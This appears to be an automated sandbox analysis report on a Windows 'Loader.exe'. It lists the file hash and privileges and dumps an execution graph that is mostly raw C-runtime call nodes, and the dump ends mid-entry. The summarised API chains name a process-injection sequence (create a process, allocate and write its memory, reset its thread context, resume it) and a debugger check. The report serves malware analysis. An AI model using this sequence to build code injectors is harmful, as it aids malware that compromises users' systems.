                                                                                                Commandline:"C:\Users\user\Desktop\Loader.exe"
                                                                                                Imagebase:0xd30000
                                                                                                File size:822'784 bytes
                                                                                                MD5 hash:0792FCE4557CAE0687A02E5E41BE587A
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:low
                                                                                                Has exited:false


                                                                                                  Execution Graph

                                                                                                  Execution Coverage:8.1%
                                                                                                  Dynamic/Decrypted Code Coverage:0.4%
                                                                                                  Signature Coverage:1.1%
                                                                                                  Total number of Nodes:2000
Total number of Limit Nodes: 35

[execution_graph: the rendered node/edge dump of the call graph (node id, address, symbol, edges) is omitted here; only the API names carried by graph nodes are kept below. The extracted dump ends mid-entry.]

API calls visible on execution-graph nodes:
- d60321 GetPEB -> d60333 CreateProcessW, VirtualAlloc, Wow64GetThreadContext, ReadProcessMemory, VirtualAllocEx -> d603da / d60424 WriteProcessMemory -> d60461 WriteProcessMemory, Wow64SetThreadContext, ResumeThread (a remote-process code-injection sequence: a child process is created, memory is allocated and written in it, its thread context is replaced and the thread resumed)
- d39b34 IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter (debugger check in the CRT startup path); d39a73, d396db, d41a2c, d41f9d IsProcessorFeaturePresent
- d320c0 GetModuleHandleA, GetProcAddress, FreeConsole; d39a20 GetModuleHandleW; d39c84 EncodePointer
- d4f6b0 / d4f6e8 / d46671 LoadLibraryExW, d4f784 / d46757 GetProcAddress, d4f77d / d46702 FreeLibrary (dynamic API resolution); d4f5ad TlsAlloc, d4f660 / d463ed TlsSetValue, d463ab TlsGetValue, d4f5e7 TlsFree
- d530fd GetConsoleMode, d53114 ReadConsoleW, d5315c / d53619 / d534a1 ReadFile; d4573f MultiByteToWideChar, d45801 WideCharToMultiByte
- d4c96e GetEnvironmentStringsW, d4c9ad / d4c9cc / d4c9f5 FreeEnvironmentStringsW; d471dc GetStdHandle, d471ef GetFileType
- d46a2c HeapAlloc, d456c2 RtlFreeHeap, d456d7 / d4f6c7 / d48c97 / d531d0 / d5312e / d533c2 GetLastError, d45abb SetLastError
- d3d13f / d41d11 / d4d018 EnterCriticalSection, d3d153 / d41d28 / d4d03b LeaveCriticalSection, d4f6a1 InitializeCriticalSectionAndSpinCount, d453d7 DeleteCriticalSection; d3a45c RaiseException (CallUnexpected)
d456b7 ___free_lconv_mon 14 API calls 17088->17089 17092 d49f3f 17089->17092 17090 d456b7 ___free_lconv_mon 14 API calls 17093 d49eff 17090->17093 17095 d49ec8 17091->17095 17097 d456b7 ___free_lconv_mon 14 API calls 17092->17097 17098 d456b7 ___free_lconv_mon 14 API calls 17093->17098 17094 d49fc6 17099 d456b7 ___free_lconv_mon 14 API calls 17094->17099 17111 d492e1 17095->17111 17096 d456b7 ___free_lconv_mon 14 API calls 17101 d49eea 17096->17101 17102 d49f4d 17097->17102 17098->17085 17103 d49fcc 17099->17103 17139 d495fd 17101->17139 17106 d456b7 ___free_lconv_mon 14 API calls 17102->17106 17103->17077 17104->17096 17108 d49ef5 17104->17108 17106->17109 17107 d456b7 14 API calls ___free_lconv_mon 17110 d49f66 17107->17110 17108->17090 17151 d4a024 17109->17151 17110->17094 17110->17107 17112 d492f2 17111->17112 17138 d493db 17111->17138 17113 d49303 17112->17113 17114 d456b7 ___free_lconv_mon 14 API calls 17112->17114 17115 d49315 17113->17115 17116 d456b7 ___free_lconv_mon 14 API calls 17113->17116 17114->17113 17117 d49327 17115->17117 17119 d456b7 ___free_lconv_mon 14 API calls 17115->17119 17116->17115 17118 d49339 17117->17118 17120 d456b7 ___free_lconv_mon 14 API calls 17117->17120 17121 d4934b 17118->17121 17122 d456b7 ___free_lconv_mon 14 API calls 17118->17122 17119->17117 17120->17118 17123 d4935d 17121->17123 17124 d456b7 ___free_lconv_mon 14 API calls 17121->17124 17122->17121 17125 d456b7 ___free_lconv_mon 14 API calls 17123->17125 17124->17123 17138->17104 17140 d49662 17139->17140 17141 d4960a 17139->17141 17140->17108 17142 d4961a 17141->17142 17144 d456b7 ___free_lconv_mon 14 API calls 17141->17144 17143 d4962c 17142->17143 17145 d456b7 ___free_lconv_mon 14 API calls 17142->17145 17146 d4963e 17143->17146 17147 d456b7 ___free_lconv_mon 14 API calls 17143->17147 17144->17142 17145->17143 17148 d49650 17146->17148 17149 d456b7 ___free_lconv_mon 14 API calls 17146->17149 17147->17146 17148->17140 17150 d456b7 ___free_lconv_mon 14 API calls 
17148->17150 17149->17148 17150->17140 17152 d4a031 17151->17152 17156 d4a050 17151->17156 17153 d496eb __Getctype 14 API calls 17152->17153 17152->17156 17154 d4a04a 17153->17154 17155 d456b7 ___free_lconv_mon 14 API calls 17154->17155 17155->17156 17156->17110 17157->17082 17208 d47d63 17158->17208 17162 d47b13 ___scrt_is_nonwritable_in_current_image 17161->17162 17163 d45a9b __dosmaperr 14 API calls 17162->17163 17164 d47b63 17162->17164 17165 d47b75 CallUnexpected 17162->17165 17170 d47b44 CallUnexpected 17162->17170 17163->17170 17166 d41314 __dosmaperr 14 API calls 17164->17166 17167 d47bab CallUnexpected 17165->17167 17222 d41d11 EnterCriticalSection 17165->17222 17168 d47b68 17166->17168 17173 d47ce5 17167->17173 17174 d47be8 17167->17174 17184 d47c16 17167->17184 17219 d419ff 17168->17219 17170->17164 17170->17165 17187 d47b4d 17170->17187 17175 d47cf0 17173->17175 17254 d41d28 LeaveCriticalSection 17173->17254 17174->17184 17223 d4594a GetLastError 17174->17223 17178 d3f18f CallUnexpected 21 API calls 17175->17178 17180 d47cf8 17178->17180 17181 d4594a __Getctype 48 API calls 17185 d47c6b 17181->17185 17183 d4594a __Getctype 48 API calls 17183->17184 17250 d47c91 17184->17250 17186 d4594a __Getctype 48 API calls 17185->17186 17185->17187 17186->17187 17187->16998 17189 d41a7c std::invalid_argument::invalid_argument CallUnexpected 17188->17189 17190 d41aa8 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 17189->17190 17191 d41b79 CallUnexpected 17190->17191 17269 d371d1 17191->17269 17193 d41b97 17193->16998 17195 d44476 17194->17195 17196 d44479 GetLastError 17194->17196 17195->16998 17277 d4f5f0 17196->17277 17199 d444f3 SetLastError 17199->16998 17200 d4f62b ___vcrt_FlsSetValue 6 API calls 17201 d444a7 __Getctype 17200->17201 17202 d444cf 17201->17202 17203 d4f62b ___vcrt_FlsSetValue 6 API calls 17201->17203 17207 d444ad 17201->17207 17204 d4f62b ___vcrt_FlsSetValue 6 API calls 17202->17204 17205 d444e3 17202->17205 17203->17202 
17204->17205 17282 d42a5e 17205->17282 17207->17199 17209 d47d6f ___scrt_is_nonwritable_in_current_image 17208->17209 17214 d41d11 EnterCriticalSection 17209->17214 17211 d47d7d 17215 d47dbf 17211->17215 17214->17211 17218 d41d28 LeaveCriticalSection 17215->17218 17217 d47b05 17217->16998 17218->17217 17255 d41c4e 17219->17255 17221 d41a0b 17221->17187 17222->17167 17224 d45960 17223->17224 17225 d45966 17223->17225 17226 d46374 __dosmaperr 6 API calls 17224->17226 17227 d463b3 __dosmaperr 6 API calls 17225->17227 17229 d4596a SetLastError 17225->17229 17226->17225 17228 d45982 17227->17228 17228->17229 17231 d469f4 __dosmaperr 14 API calls 17228->17231 17233 d459ff 17229->17233 17234 d459fa 17229->17234 17232 d45997 17231->17232 17235 d459b0 17232->17235 17236 d4599f 17232->17236 17237 d41f83 CallUnexpected 46 API calls 17233->17237 17234->17183 17239 d463b3 __dosmaperr 6 API calls 17235->17239 17238 d463b3 __dosmaperr 6 API calls 17236->17238 17240 d45a04 17237->17240 17248 d459ad 17238->17248 17241 d459bc 17239->17241 17242 d459d7 17241->17242 17243 d459c0 17241->17243 17244 d45c5c __dosmaperr 14 API calls 17242->17244 17245 d463b3 __dosmaperr 6 API calls 17243->17245 17247 d459e2 17244->17247 17245->17248 17246 d456b7 ___free_lconv_mon 14 API calls 17246->17229 17249 d456b7 ___free_lconv_mon 14 API calls 17247->17249 17248->17246 17249->17229 17251 d47c95 17250->17251 17252 d47c5d 17250->17252 17268 d41d28 LeaveCriticalSection 17251->17268 17252->17181 17252->17185 17252->17187 17254->17175 17256 d41c60 _Fputc 17255->17256 17259 d41ba8 17256->17259 17258 d41c78 _Fputc 17258->17221 17260 d41bbf 17259->17260 17261 d41bb8 17259->17261 17263 d41c25 __strnicoll GetLastError SetLastError 17260->17263 17265 d41bcd 17260->17265 17262 d3d620 __strnicoll 16 API calls 17261->17262 17262->17260 17264 d41bf4 17263->17264 17264->17265 17266 d41a2c __Getctype 11 API calls 17264->17266 17265->17258 17267 d41c24 17266->17267 17268->17252 17270 d371da IsProcessorFeaturePresent 
17269->17270 17271 d371d9 17269->17271 17273 d395cd 17270->17273 17271->17193 17276 d396b3 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 17273->17276 17275 d396b0 17275->17193 17276->17275 17278 d4f6fb ___vcrt_FlsGetValue 5 API calls 17277->17278 17279 d4f60a 17278->17279 17280 d4f622 TlsGetValue 17279->17280 17281 d4448e 17279->17281 17280->17281 17281->17199 17281->17200 17281->17207 17283 d456b7 ___free_lconv_mon 14 API calls 17282->17283 17284 d42a76 17283->17284 17284->17207 17318 d3c7ea 17285->17318 17288 d474e0 17290 d474f7 17288->17290 17291 d474e5 GetACP 17288->17291 17289 d474ce GetOEMCP 17289->17290 17290->16958 17292 d456f1 17290->17292 17291->17290 17293 d4572f 17292->17293 17297 d456ff __dosmaperr 17292->17297 17295 d41314 __dosmaperr 14 API calls 17293->17295 17294 d4571a RtlAllocateHeap 17296 d4572d 17294->17296 17294->17297 17295->17296 17296->16954 17296->16955 17297->17293 17297->17294 17298 d3f4ab std::ios_base::_Init 2 API calls 17297->17298 17298->17297 17300 d474ad 50 API calls 17299->17300 17301 d472c8 17300->17301 17302 d473cd 17301->17302 17304 d47305 IsValidCodePage 17301->17304 17309 d47320 std::invalid_argument::invalid_argument 17301->17309 17303 d371d1 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 17302->17303 17305 d474ab 17303->17305 17304->17302 17306 d47317 17304->17306 17305->16960 17305->16964 17307 d47340 GetCPInfo 17306->17307 17306->17309 17307->17302 17307->17309 17358 d47837 17309->17358 17311 d479e8 ___scrt_is_nonwritable_in_current_image 17310->17311 17438 d41d11 EnterCriticalSection 17311->17438 17313 d479f2 17439 d47776 17313->17439 17319 d3c808 17318->17319 17325 d3c801 17318->17325 17320 d4594a __Getctype 48 API calls 17319->17320 17319->17325 17321 d3c829 17320->17321 17326 d45f2e 17321->17326 17325->17288 17325->17289 17327 d45f41 17326->17327 17329 d3c83f 17326->17329 17327->17329 17334 d4a055 17327->17334 17330 d45f5b 17329->17330 17331 d45f83 
17330->17331 17332 d45f6e 17330->17332 17331->17325 17332->17331 17355 d47242 17332->17355 17335 d4a061 ___scrt_is_nonwritable_in_current_image 17334->17335 17336 d4594a __Getctype 48 API calls 17335->17336 17337 d4a06a 17336->17337 17344 d4a0b0 17337->17344 17347 d41d11 EnterCriticalSection 17337->17347 17339 d4a088 17348 d4a0d6 17339->17348 17344->17329 17345 d41f83 CallUnexpected 48 API calls 17346 d4a0d5 17345->17346 17347->17339 17349 d4a0e4 __Getctype 17348->17349 17351 d4a099 17348->17351 17350 d49e8a __Getctype 14 API calls 17349->17350 17349->17351 17350->17351 17352 d4a0b5 17351->17352 17353 d41d28 std::_Lockit::~_Lockit LeaveCriticalSection 17352->17353 17354 d4a0ac 17353->17354 17354->17344 17354->17345 17356 d4594a __Getctype 48 API calls 17355->17356 17357 d47247 17356->17357 17357->17331 17359 d4785f GetCPInfo 17358->17359 17368 d47928 17358->17368 17364 d47877 17359->17364 17359->17368 17361 d371d1 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 17363 d479da 17361->17363 17363->17302 17369 d46ce0 17364->17369 17368->17361 17370 d3c7ea __strnicoll 48 API calls 17369->17370 17371 d46d00 17370->17371 17389 d4573f 17371->17389 17373 d46dbc 17376 d371d1 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 17373->17376 17374 d46db4 17392 d39f07 17374->17392 17375 d46d2d 17375->17373 17375->17374 17378 d456f1 __strnicoll 15 API calls 17375->17378 17380 d46d52 std::invalid_argument::invalid_argument __alloca_probe_16 17375->17380 17379 d46ddf 17376->17379 17378->17380 17384 d46de1 17379->17384 17380->17374 17381 d4573f __strnicoll MultiByteToWideChar 17380->17381 17382 d46d9b 17381->17382 17382->17374 17383 d46da2 GetStringTypeW 17382->17383 17383->17374 17385 d3c7ea __strnicoll 48 API calls 17384->17385 17386 d46df4 17385->17386 17398 d46e2a 17386->17398 17396 d45769 17389->17396 17393 d39f22 17392->17393 17394 d39f11 17392->17394 17393->17373 17394->17393 17395 d42a5e __freea 14 API calls 17394->17395 17395->17393 
17397 d4575b MultiByteToWideChar 17396->17397 17397->17375 17399 d46e45 __strnicoll 17398->17399 17400 d4573f __strnicoll MultiByteToWideChar 17399->17400 17404 d46e89 17400->17404 17401 d47004 17404->17401 17405 d456f1 __strnicoll 15 API calls 17404->17405 17407 d46eaf __alloca_probe_16 17404->17407 17418 d46f57 17404->17418 17405->17407 17407->17418 17438->17313 17449 d433bb 17439->17449 17441 d47798 17442 d433bb 29 API calls 17441->17442 17443 d477b7 17442->17443 17444 d477de 17443->17444 17445 d456b7 ___free_lconv_mon 14 API calls 17443->17445 17446 d47a1d 17444->17446 17445->17444 17463 d41d28 LeaveCriticalSection 17446->17463 17448 d47a0b 17448->16965 17450 d433cc 17449->17450 17459 d433c8 _Yarn 17449->17459 17451 d433e6 std::invalid_argument::invalid_argument 17450->17451 17452 d433d3 17450->17452 17456 d43414 17451->17456 17457 d4341d 17451->17457 17451->17459 17453 d41314 __dosmaperr 14 API calls 17452->17453 17454 d433d8 17453->17454 17455 d419ff __strnicoll 29 API calls 17454->17455 17455->17459 17458 d41314 __dosmaperr 14 API calls 17456->17458 17457->17459 17461 d41314 __dosmaperr 14 API calls 17457->17461 17460 d43419 17458->17460 17459->17441 17462 d419ff __strnicoll 29 API calls 17460->17462 17461->17460 17462->17459 17463->17448 17465 d4533a 17464->17465 17466 d45348 17464->17466 17465->17466 17471 d45360 17465->17471 17467 d41314 __dosmaperr 14 API calls 17466->17467 17468 d45350 17467->17468 17469 d419ff __strnicoll 29 API calls 17468->17469 17470 d4535a 17469->17470 17470->16913 17471->17470 17472 d41314 __dosmaperr 14 API calls 17471->17472 17472->17468 17474 d417f3 17473->17474 17478 d41810 17473->17478 17475 d4180a 17474->17475 17476 d456b7 ___free_lconv_mon 14 API calls 17474->17476 17477 d456b7 ___free_lconv_mon 14 API calls 17475->17477 17476->17474 17477->17478 17478->16911 17480 d41a38 17479->17480 17481 d41a60 CallUnexpected 8 API calls 17480->17481 17482 d41a4d GetCurrentProcess TerminateProcess 17481->17482 17482->16917 17484 d4ca50 
17483->17484 17485 d4ca61 17484->17485 17487 d4ca74 ___from_strstr_to_strchr 17484->17487 17486 d41314 __dosmaperr 14 API calls 17485->17486 17496 d4ca66 17486->17496 17488 d4cc8b 17487->17488 17489 d4ca94 17487->17489 17490 d41314 __dosmaperr 14 API calls 17488->17490 17546 d4ccb0 17489->17546 17492 d4cc90 17490->17492 17494 d456b7 ___free_lconv_mon 14 API calls 17492->17494 17494->17496 17495 d4cad8 17532 d4cac4 17495->17532 17550 d4ccca 17495->17550 17496->16858 17497 d4cada 17501 d469f4 __dosmaperr 14 API calls 17497->17501 17497->17532 17499 d4cab6 17506 d4cad3 17499->17506 17507 d4cabf 17499->17507 17503 d4cae8 17501->17503 17502 d456b7 ___free_lconv_mon 14 API calls 17502->17496 17505 d456b7 ___free_lconv_mon 14 API calls 17503->17505 17504 d4cb4d 17509 d456b7 ___free_lconv_mon 14 API calls 17504->17509 17510 d4caf3 17505->17510 17508 d4ccb0 48 API calls 17506->17508 17511 d41314 __dosmaperr 14 API calls 17507->17511 17508->17495 17517 d4cb55 17509->17517 17510->17495 17515 d469f4 __dosmaperr 14 API calls 17510->17515 17510->17532 17511->17532 17512 d4cb98 17513 d4c065 std::ios_base::_Init 32 API calls 17512->17513 17512->17532 17514 d4cbc6 17513->17514 17516 d456b7 ___free_lconv_mon 14 API calls 17514->17516 17519 d4cb0f 17515->17519 17522 d4cb82 17516->17522 17517->17522 17554 d4c065 17517->17554 17518 d4cc80 17520 d456b7 ___free_lconv_mon 14 API calls 17518->17520 17523 d456b7 ___free_lconv_mon 14 API calls 17519->17523 17520->17496 17522->17518 17522->17522 17526 d469f4 __dosmaperr 14 API calls 17522->17526 17522->17532 17523->17495 17524 d4cb79 17525 d456b7 ___free_lconv_mon 14 API calls 17524->17525 17525->17522 17527 d4cc11 17526->17527 17528 d4cc21 17527->17528 17529 d4cc19 17527->17529 17531 d4532c ___std_exception_copy 29 API calls 17528->17531 17530 d456b7 ___free_lconv_mon 14 API calls 17529->17530 17530->17532 17533 d4cc2d 17531->17533 17532->17502 17534 d4cc34 17533->17534 17535 d4cca5 17533->17535 17563 d5392c 17534->17563 17536 d41a2c 
__Getctype 11 API calls 17535->17536 17538 d4ccaf 17536->17538 17540 d4cc7a 17542 d456b7 ___free_lconv_mon 14 API calls 17540->17542 17541 d4cc5b 17543 d41314 __dosmaperr 14 API calls 17541->17543 17542->17518 17544 d4cc60 17543->17544 17545 d456b7 ___free_lconv_mon 14 API calls 17544->17545 17545->17532 17547 d4ccbd 17546->17547 17549 d4ca9f 17546->17549 17578 d4cd1f 17547->17578 17549->17495 17549->17497 17549->17499 17551 d4cb3d 17550->17551 17553 d4cce0 17550->17553 17551->17504 17551->17512 17553->17551 17593 d5383b 17553->17593 17555 d4c072 17554->17555 17556 d4c08d 17554->17556 17555->17556 17557 d4c07e 17555->17557 17558 d4c09c 17556->17558 17693 d527c4 17556->17693 17559 d41314 __dosmaperr 14 API calls 17557->17559 17700 d4f005 17558->17700 17561 d4c083 std::invalid_argument::invalid_argument 17559->17561 17561->17524 17712 d469b5 17563->17712 17568 d5399f 17570 d456b7 ___free_lconv_mon 14 API calls 17568->17570 17571 d539ab 17568->17571 17569 d469b5 48 API calls 17573 d5397c 17569->17573 17570->17571 17572 d4cc55 17571->17572 17574 d456b7 ___free_lconv_mon 14 API calls 17571->17574 17572->17540 17572->17541 17575 d3c8e4 17 API calls 17573->17575 17574->17572 17576 d53989 17575->17576 17576->17568 17577 d53993 SetEnvironmentVariableW 17576->17577 17577->17568 17579 d4cd32 17578->17579 17580 d4cd2d 17578->17580 17581 d469f4 __dosmaperr 14 API calls 17579->17581 17580->17549 17582 d4cd4f 17581->17582 17583 d4cdbd 17582->17583 17586 d4cdc2 17582->17586 17589 d469f4 __dosmaperr 14 API calls 17582->17589 17590 d456b7 ___free_lconv_mon 14 API calls 17582->17590 17591 d4532c ___std_exception_copy 29 API calls 17582->17591 17592 d4cdac 17582->17592 17584 d41f83 CallUnexpected 48 API calls 17583->17584 17584->17586 17585 d456b7 ___free_lconv_mon 14 API calls 17585->17580 17587 d41a2c __Getctype 11 API calls 17586->17587 17588 d4cdce 17587->17588 17589->17582 17590->17582 17591->17582 17592->17585 17594 d5384f 17593->17594 17595 d53849 17593->17595 17611 d53864 
17594->17611 17598 d54063 17595->17598 17599 d540ab 17595->17599 17601 d54069 17598->17601 17602 d54086 17598->17602 17631 d540c1 17599->17631 17604 d41314 __dosmaperr 14 API calls 17601->17604 17606 d41314 __dosmaperr 14 API calls 17602->17606 17610 d540a4 17602->17610 17603 d54079 17603->17553 17605 d5406e 17604->17605 17607 d419ff __strnicoll 29 API calls 17605->17607 17608 d54095 17606->17608 17607->17603 17609 d419ff __strnicoll 29 API calls 17608->17609 17609->17603 17610->17553 17612 d3c7ea __strnicoll 48 API calls 17611->17612 17613 d5387a 17612->17613 17614 d53896 17613->17614 17615 d538ad 17613->17615 17630 d5385f 17613->17630 17616 d41314 __dosmaperr 14 API calls 17614->17616 17617 d538b6 17615->17617 17618 d538c8 17615->17618 17619 d5389b 17616->17619 17621 d41314 __dosmaperr 14 API calls 17617->17621 17622 d538d5 17618->17622 17623 d538e8 17618->17623 17620 d419ff __strnicoll 29 API calls 17619->17620 17620->17630 17624 d538bb 17621->17624 17625 d540c1 __strnicoll 48 API calls 17622->17625 17649 d5418c 17623->17649 17627 d419ff __strnicoll 29 API calls 17624->17627 17625->17630 17627->17630 17629 d41314 __dosmaperr 14 API calls 17629->17630 17630->17553 17632 d540d1 17631->17632 17633 d540eb 17631->17633 17634 d41314 __dosmaperr 14 API calls 17632->17634 17635 d540f3 17633->17635 17636 d5410a 17633->17636 17637 d540d6 17634->17637 17638 d41314 __dosmaperr 14 API calls 17635->17638 17639 d54116 17636->17639 17640 d5412d 17636->17640 17641 d419ff __strnicoll 29 API calls 17637->17641 17642 d540f8 17638->17642 17643 d41314 __dosmaperr 14 API calls 17639->17643 17644 d3c7ea __strnicoll 48 API calls 17640->17644 17647 d540e1 17640->17647 17641->17647 17645 d419ff __strnicoll 29 API calls 17642->17645 17646 d5411b 17643->17646 17644->17647 17645->17647 17648 d419ff __strnicoll 29 API calls 17646->17648 17647->17603 17648->17647 17650 d3c7ea __strnicoll 48 API calls 17649->17650 17651 d5419f 17650->17651 17654 d541d2 17651->17654 17655 d54206 __strnicoll 
17654->17655 17658 d5446a 17655->17658 17659 d54286 17655->17659 17661 d54273 GetCPInfo 17655->17661 17664 d5428a 17655->17664 17656 d371d1 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 17657 d538fe 17656->17657 17657->17629 17657->17630 17660 d4573f __strnicoll MultiByteToWideChar 17659->17660 17659->17664 17663 d5430c 17660->17663 17661->17659 17661->17664 17662 d5445e 17665 d39f07 __freea 14 API calls 17662->17665 17663->17662 17663->17664 17666 d456f1 __strnicoll 15 API calls 17663->17666 17667 d54333 __alloca_probe_16 17663->17667 17664->17656 17664->17658 17665->17664 17666->17667 17667->17662 17668 d4573f __strnicoll MultiByteToWideChar 17667->17668 17669 d5437f 17668->17669 17669->17662 17670 d4573f __strnicoll MultiByteToWideChar 17669->17670 17671 d5439b 17670->17671 17671->17662 17672 d543a9 17671->17672 17673 d5440c 17672->17673 17674 d456f1 __strnicoll 15 API calls 17672->17674 17678 d543c2 __alloca_probe_16 17672->17678 17675 d39f07 __freea 14 API calls 17673->17675 17674->17678 17676 d54412 17675->17676 17677 d39f07 __freea 14 API calls 17676->17677 17677->17664 17678->17673 17679 d4573f __strnicoll MultiByteToWideChar 17678->17679 17680 d54405 17679->17680 17680->17673 17681 d5442e 17680->17681 17687 d46245 17681->17687 17684 d39f07 __freea 14 API calls 17688 d467ac std::_Lockit::_Lockit 5 API calls 17687->17688 17689 d46250 17688->17689 17690 d46256 17689->17690 17691 d4658f __strnicoll 5 API calls 17689->17691 17690->17684 17692 d46296 CompareStringW 17691->17692 17692->17690 17694 d527e4 HeapSize 17693->17694 17695 d527cf 17693->17695 17694->17558 17696 d41314 __dosmaperr 14 API calls 17695->17696 17697 d527d4 17696->17697 17698 d419ff __strnicoll 29 API calls 17697->17698 17699 d527df 17698->17699 17699->17558 17701 d4f012 17700->17701 17702 d4f01d 17700->17702 17703 d456f1 __strnicoll 15 API calls 17701->17703 17704 d4f025 17702->17704 17710 d4f02e __dosmaperr 17702->17710 17708 d4f01a 17703->17708 17705 d456b7 
___free_lconv_mon 14 API calls 17704->17705 17705->17708 17706 d4f033 17709 d41314 __dosmaperr 14 API calls 17706->17709 17707 d4f058 HeapReAlloc 17707->17708 17707->17710 17708->17561 17709->17708 17710->17706 17710->17707 17711 d3f4ab std::ios_base::_Init 2 API calls 17710->17711 17711->17710 17713 d3c7ea __strnicoll 48 API calls 17712->17713 17714 d469c7 17713->17714 17715 d469d9 17714->17715 17720 d46226 17714->17720 17717 d3c8e4 17715->17717 17726 d3c93c 17717->17726 17723 d46792 17720->17723 17724 d4670d std::_Lockit::_Lockit 5 API calls 17723->17724 17725 d4622e 17724->17725 17725->17715 17727 d3c964 17726->17727 17728 d3c94a 17726->17728 17729 d3c96b 17727->17729 17730 d3c98a 17727->17730 17744 d3c8ca 17728->17744 17732 d3c8fc 17729->17732 17748 d3c88b 17729->17748 17733 d4573f __strnicoll MultiByteToWideChar 17730->17733 17732->17568 17732->17569 17735 d3c999 17733->17735 17736 d3c9a0 GetLastError 17735->17736 17738 d3c88b 15 API calls 17735->17738 17741 d3c9c6 17735->17741 17753 d4133a 17736->17753 17738->17741 17739 d4573f __strnicoll MultiByteToWideChar 17742 d3c9dd 17739->17742 17741->17732 17741->17739 17742->17732 17742->17736 17743 d41314 __dosmaperr 14 API calls 17743->17732 17745 d3c8dd 17744->17745 17746 d3c8d5 17744->17746 17745->17732 17747 d456b7 ___free_lconv_mon 14 API calls 17746->17747 17747->17745 17749 d3c8ca 14 API calls 17748->17749 17750 d3c899 17749->17750 17758 d3c86c 17750->17758 17761 d41327 17753->17761 17755 d41345 __dosmaperr 17756 d41314 __dosmaperr 14 API calls 17755->17756 17757 d3c9ac 17756->17757 17757->17743 17759 d456f1 __strnicoll 15 API calls 17758->17759 17760 d3c879 17759->17760 17760->17732 17762 d45a9b __dosmaperr 14 API calls 17761->17762 17763 d4132c 17762->17763 17763->17755 17767 d32010 GetModuleHandleA GetModuleFileNameW 17764->17767 17774 d4401a 17767->17774 17769 d32081 17778 d31f00 17769->17778 17772 d371d1 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 17773 d32099 17772->17773 
17773->16722 17775 d4402d _Fputc 17774->17775 17787 d4408f 17775->17787 17777 d4403f _Fputc 17777->17769 17829 d31ba0 GetPEB 17778->17829 17780 d31f1f 17830 d31c10 GetProcAddress 17780->17830 17782 d31f39 17783 d371d1 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 17782->17783 17784 d31ffb 17783->17784 17784->17772 17785 d31f31 17785->17782 17843 d31db0 17785->17843 17788 d440bf 17787->17788 17789 d440ec 17788->17789 17790 d440ce 17788->17790 17808 d440c3 17788->17808 17800 d440f9 17789->17800 17811 d3d5c0 17789->17811 17791 d41ba8 __strnicoll 29 API calls 17790->17791 17791->17808 17792 d44131 17797 d44145 17792->17797 17798 d442c1 17792->17798 17793 d44113 17817 d4f46b 17793->17817 17794 d371d1 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 17799 d44334 17794->17799 17802 d441df 17797->17802 17806 d44189 17797->17806 17797->17808 17801 d45801 _Fputc WideCharToMultiByte 17798->17801 17798->17808 17799->17777 17800->17792 17800->17793 17801->17808 17803 d45801 _Fputc WideCharToMultiByte 17802->17803 17805 d441f2 17803->17805 17804 d45801 _Fputc WideCharToMultiByte 17804->17808 17807 d4420b GetLastError 17805->17807 17805->17808 17806->17804 17807->17808 17810 d4421a 17807->17810 17808->17794 17809 d45801 _Fputc WideCharToMultiByte 17809->17810 17810->17808 17810->17809 17812 d3d5d0 17811->17812 17821 d45f88 17812->17821 17820 d4f4a2 _Yarn std::_Locinfo::_Locinfo_dtor 17817->17820 17818 d371d1 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 17819 d4f578 17818->17819 17819->17808 17820->17818 17822 d3d5ed 17821->17822 17823 d45f9f 17821->17823 17825 d45fb9 17822->17825 17823->17822 17824 d4a055 __Getctype 48 API calls 17823->17824 17824->17822 17826 d3d5fa 17825->17826 17827 d45fd0 17825->17827 17826->17800 17827->17826 17828 d47242 __strnicoll 48 API calls 17827->17828 17828->17826 17829->17780 17831 d31c59 CreateFileA 17830->17831 17832 d31cb3 GetFileSize 17831->17832 17833 d31caa 17831->17833 
17834 d31cd9 CloseHandle 17832->17834 17836 d31cf1 17832->17836 17835 d371d1 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 17833->17835 17834->17833 17837 d31d98 17835->17837 17838 d31cfc ReadFile 17836->17838 17837->17785 17839 d31d70 CloseHandle 17838->17839 17840 d31d3c 17838->17840 17839->17833 17841 d31d58 CloseHandle 17840->17841 17842 d31d4d 17840->17842 17841->17833 17842->17841 17855 d31000 17843->17855 17846 d31000 115 API calls 17847 d31e5b GetProcAddress 17846->17847 17848 d31e84 VirtualProtect 17847->17848 17850 d31ed1 17848->17850 17851 d31edc 17848->17851 17866 d31bd0 17850->17866 17853 d371d1 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 17851->17853 17854 d31eeb 17853->17854 17854->17782 17856 d31056 17855->17856 17870 d31440 17856->17870 17858 d313c7 17899 d31b80 17858->17899 17863 d31167 _Yarn 17863->17858 17865 d42a5e __freea 14 API calls 17863->17865 17874 d31490 17863->17874 17877 d314c0 17863->17877 17893 d31af0 17863->17893 17865->17863 17867 d31bfa 17866->17867 17868 d371d1 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 17867->17868 17869 d31c04 17868->17869 17869->17851 17871 d31466 std::ios_base::_Init 17870->17871 17872 d371d1 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 17871->17872 17873 d31487 17872->17873 17873->17863 17902 d32410 17874->17902 17876 d314aa 17876->17863 17879 d31510 _strlen 17877->17879 17949 d33090 17879->17949 17880 d315b1 17886 d315c4 17880->17886 17953 d331c0 17880->17953 17975 d335f0 17886->17975 17894 d31b20 _Fputc 17893->17894 18145 d32130 17894->18145 17897 